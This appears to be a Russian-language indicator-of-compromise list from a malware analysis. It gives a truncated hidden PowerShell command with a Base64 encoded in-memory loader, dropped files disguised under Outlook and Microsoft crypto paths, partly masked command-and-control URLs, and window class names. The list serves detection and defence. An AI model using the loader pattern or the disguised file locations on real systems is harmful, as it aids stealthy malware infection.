Техническая информация
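- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Sta -Nop -Window Hidden -EncodedCommand cwB2ACAAbwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACkAOwBzAHYAIABkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0A...
  (Примечание: значение -EncodedCommand — это Base64 от текста в UTF-16LE; приведённый усечённый фрагмент декодируется как «sv o (New-Object IO.MemoryStream);sv d (New-Object IO.Com…», остальная часть команды на странице не показана.)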
- %LOCALAPPDATA%\microsoft\forms\frmdata64.dat
- %TEMP%\outlook logging\firstrun.log
- %WINDIR%\inf\outlook\outlperf.h
- %WINDIR%\inf\outlook\0009\outlperf.ini
- %APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\ff9e1b7b5e9e7033a1d3a2256afbeef5_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
- http://sk###rkslnc.com/en-us/index.html
- http://sk###rkslnc.com/en-us/docs.html
- http://sk###rkslnc.com/en-us/test.html
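- DNS ASK sk###rkslnc.com
  (Примечание: символы «###» в имени домена здесь и в URL выше, по-видимому, скрыты источником, поэтому для точного сопоставления индикатор в таком виде не годится.)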
- ClassName: 'mspim_wnd32' WindowName: 'Microsoft Outlook'
- ClassName: 'rencat' WindowName: ''
- '%ProgramFiles%\microsoft office\office14\outlook.exe' -Embedding